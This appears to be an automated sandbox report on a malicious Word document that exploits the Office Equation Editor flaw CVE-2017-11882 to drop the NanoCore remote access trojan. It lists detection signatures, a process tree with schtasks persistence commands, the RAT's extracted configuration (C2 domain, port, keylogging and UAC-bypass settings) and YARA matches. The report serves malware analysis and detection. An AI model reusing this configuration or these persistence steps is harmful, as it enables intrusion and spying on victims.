Play interactive tour

Edit tour

Analysis Report NEW ORDER Ref PO-298721.doc

Overview

General Information

Sample Name:	NEW ORDER Ref PO-298721.doc
Analysis ID:	431710
MD5:	f343ce75606d600a978f4593ad92a5ed
SHA1:	0aca94dd295f12f4deb4505a3f3dd470a7a59752
SHA256:	194abfeb6f78221b43aff1da8d0aceead6282979840d9aa43bfc20d190ba0ddd
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM3

Yara detected Nanocore RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large strings

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2352 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cat464923.exe (PID: 2668 cmdline: C:\Users\user\AppData\Roaming\cat464923.exe MD5: 61DE33A77D34A313DF07DC2BDD28140A)

cat464923.exe (PID: 2324 cmdline: {path} MD5: 61DE33A77D34A313DF07DC2BDD28140A)

schtasks.exe (PID: 2800 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

schtasks.exe (PID: 2988 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 2904 cmdline: taskeng.exe {C1636649-2706-44BF-BD6B-15CC427FB25D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

cat464923.exe (PID: 2468 cmdline: C:\Users\user\AppData\Roaming\cat464923.exe 0 MD5: 61DE33A77D34A313DF07DC2BDD28140A)

cat464923.exe (PID: 1544 cmdline: {path} MD5: 61DE33A77D34A313DF07DC2BDD28140A)

smtpsvc.exe (PID: 2416 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 61DE33A77D34A313DF07DC2BDD28140A)

smtpsvc.exe (PID: 1688 cmdline: {path} MD5: 61DE33A77D34A313DF07DC2BDD28140A)

smtpsvc.exe (PID: 2620 cmdline: {path} MD5: 61DE33A77D34A313DF07DC2BDD28140A)

smtpsvc.exe (PID: 2252 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 61DE33A77D34A313DF07DC2BDD28140A)

smtpsvc.exe (PID: 2004 cmdline: {path} MD5: 61DE33A77D34A313DF07DC2BDD28140A)

smtpsvc.exe (PID: 2536 cmdline: {path} MD5: 61DE33A77D34A313DF07DC2BDD28140A)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "f9198f9a-66a7-4bba-ab1c-dff8091c", "Group": "Default", "Domain1": "tzitziklishop.ddns.net", "Domain2": "tzitziklishop.ddns.net", "Port": 1665, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "", "BackupDNSServer": "37.235.1.177", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x43145:$a: NanoCore 0x4319e:$a: NanoCore 0x431db:$a: NanoCore 0x43254:$a: NanoCore 0x568ff:$a: NanoCore 0x56914:$a: NanoCore 0x56949:$a: NanoCore 0x6f903:$a: NanoCore 0x6f918:$a: NanoCore 0x6f94d:$a: NanoCore 0x431a7:$b: ClientPlugin 0x431e4:$b: ClientPlugin 0x43ae2:$b: ClientPlugin 0x43aef:$b: ClientPlugin 0x566bb:$b: ClientPlugin 0x566d6:$b: ClientPlugin 0x56706:$b: ClientPlugin 0x5691d:$b: ClientPlugin 0x56952:$b: ClientPlugin 0x6f6bf:$b: ClientPlugin 0x6f6da:$b: ClientPlugin
00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x43145:$a: NanoCore 0x4319e:$a: NanoCore 0x431db:$a: NanoCore 0x43254:$a: NanoCore 0x568ff:$a: NanoCore 0x56914:$a: NanoCore 0x56949:$a: NanoCore 0x6f903:$a: NanoCore 0x6f918:$a: NanoCore 0x6f94d:$a: NanoCore 0x431a7:$b: ClientPlugin 0x431e4:$b: ClientPlugin 0x43ae2:$b: ClientPlugin 0x43aef:$b: ClientPlugin 0x566bb:$b: ClientPlugin 0x566d6:$b: ClientPlugin 0x56706:$b: ClientPlugin 0x5691d:$b: ClientPlugin 0x56952:$b: ClientPlugin 0x6f6bf:$b: ClientPlugin 0x6f6da:$b: ClientPlugin
00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x9c135:$x1: NanoCore.ClientPluginHost 0x9c172:$x2: IClientNetworkHost 0x9fca5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x9be9d:$a: NanoCore 0x9bead:$a: NanoCore 0x9c0e1:$a: NanoCore 0x9c0f5:$a: NanoCore 0x9c135:$a: NanoCore 0x9befc:$b: ClientPlugin 0x9c0fe:$b: ClientPlugin 0x9c13e:$b: ClientPlugin 0x9c023:$c: ProjectData 0x193921:$c: ProjectData 0x9ca2a:$d: DESCrypto 0xa43f6:$e: KeepAlive 0xa23e4:$g: LogClientMessage 0x9e5df:$i: get_Connected 0x9cd60:$j: #=q 0x9cd90:$j: #=q 0x9cdac:$j: #=q 0x9cddc:$j: #=q 0x9cdf8:$j: #=q 0x9ce14:$j: #=q 0x9ce44:$j: #=q
00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3145:$a: NanoCore 0x319e:$a: NanoCore 0x31db:$a: NanoCore 0x3254:$a: NanoCore 0x168ff:$a: NanoCore 0x16914:$a: NanoCore 0x16949:$a: NanoCore 0x2f903:$a: NanoCore 0x2f918:$a: NanoCore 0x2f94d:$a: NanoCore 0x31a7:$b: ClientPlugin 0x31e4:$b: ClientPlugin 0x3ae2:$b: ClientPlugin 0x3aef:$b: ClientPlugin 0x166bb:$b: ClientPlugin 0x166d6:$b: ClientPlugin 0x16706:$b: ClientPlugin 0x1691d:$b: ClientPlugin 0x16952:$b: ClientPlugin 0x2f6bf:$b: ClientPlugin 0x2f6da:$b: ClientPlugin
0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x9c135:$x1: NanoCore.ClientPluginHost 0x9c172:$x2: IClientNetworkHost 0x9fca5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x9be9d:$a: NanoCore 0x9bead:$a: NanoCore 0x9c0e1:$a: NanoCore 0x9c0f5:$a: NanoCore 0x9c135:$a: NanoCore 0x9befc:$b: ClientPlugin 0x9c0fe:$b: ClientPlugin 0x9c13e:$b: ClientPlugin 0x9c023:$c: ProjectData 0x193921:$c: ProjectData 0x9ca2a:$d: DESCrypto 0xa43f6:$e: KeepAlive 0xa23e4:$g: LogClientMessage 0x9e5df:$i: get_Connected 0x9cd60:$j: #=q 0x9cd90:$j: #=q 0x9cdac:$j: #=q 0x9cddc:$j: #=q 0x9cdf8:$j: #=q 0x9ce14:$j: #=q 0x9ce44:$j: #=q
00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x9c135:$x1: NanoCore.ClientPluginHost 0x9c172:$x2: IClientNetworkHost 0x9fca5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x9be9d:$a: NanoCore 0x9bead:$a: NanoCore 0x9c0e1:$a: NanoCore 0x9c0f5:$a: NanoCore 0x9c135:$a: NanoCore 0x9befc:$b: ClientPlugin 0x9c0fe:$b: ClientPlugin 0x9c13e:$b: ClientPlugin 0x9c023:$c: ProjectData 0x193921:$c: ProjectData 0x9ca2a:$d: DESCrypto 0xa43f6:$e: KeepAlive 0xa23e4:$g: LogClientMessage 0x9e5df:$i: get_Connected 0x9cd60:$j: #=q 0x9cd90:$j: #=q 0x9cdac:$j: #=q 0x9cddc:$j: #=q 0x9cdf8:$j: #=q 0x9ce14:$j: #=q 0x9ce44:$j: #=q
00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xdbf0d:$x1: NanoCore.ClientPluginHost 0xdbf4a:$x2: IClientNetworkHost 0xdfa7d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xdbc75:$a: NanoCore 0xdbc85:$a: NanoCore 0xdbeb9:$a: NanoCore 0xdbecd:$a: NanoCore 0xdbf0d:$a: NanoCore 0xdbcd4:$b: ClientPlugin 0xdbed6:$b: ClientPlugin 0xdbf16:$b: ClientPlugin 0xdbdfb:$c: ProjectData 0xdc802:$d: DESCrypto 0xe41ce:$e: KeepAlive 0xe21bc:$g: LogClientMessage 0xde3b7:$i: get_Connected 0x5ab30:$j: #=q 0xdcb38:$j: #=q 0xdcb68:$j: #=q 0xdcb84:$j: #=q 0xdcbb4:$j: #=q 0xdcbd0:$j: #=q 0xdcbec:$j: #=q 0xdcc1c:$j: #=q
00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24ba7:$a: NanoCore 0x24c00:$a: NanoCore 0x24c3d:$a: NanoCore 0x24cb6:$a: NanoCore 0x24c09:$b: ClientPlugin 0x24c46:$b: ClientPlugin 0x25544:$b: ClientPlugin 0x25551:$b: ClientPlugin 0x1ad2f:$e: KeepAlive 0x25091:$g: LogClientMessage 0x25011:$i: get_Connected 0x14fdd:$j: #=q 0x1500d:$j: #=q 0x15049:$j: #=q 0x15071:$j: #=q 0x150a1:$j: #=q 0x150d1:$j: #=q 0x15101:$j: #=q 0x15131:$j: #=q 0x1514d:$j: #=q 0x1517d:$j: #=q
00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xdbf0d:$x1: NanoCore.ClientPluginHost 0xdbf4a:$x2: IClientNetworkHost 0xdfa7d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xdbc75:$a: NanoCore 0xdbc85:$a: NanoCore 0xdbeb9:$a: NanoCore 0xdbecd:$a: NanoCore 0xdbf0d:$a: NanoCore 0xdbcd4:$b: ClientPlugin 0xdbed6:$b: ClientPlugin 0xdbf16:$b: ClientPlugin 0xdbdfb:$c: ProjectData 0xdc802:$d: DESCrypto 0xe41ce:$e: KeepAlive 0xe21bc:$g: LogClientMessage 0xde3b7:$i: get_Connected 0x5ab30:$j: #=q 0xdcb38:$j: #=q 0xdcb68:$j: #=q 0xdcb84:$j: #=q 0xdcbb4:$j: #=q 0xdcbd0:$j: #=q 0xdcbec:$j: #=q 0xdcc1c:$j: #=q
00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
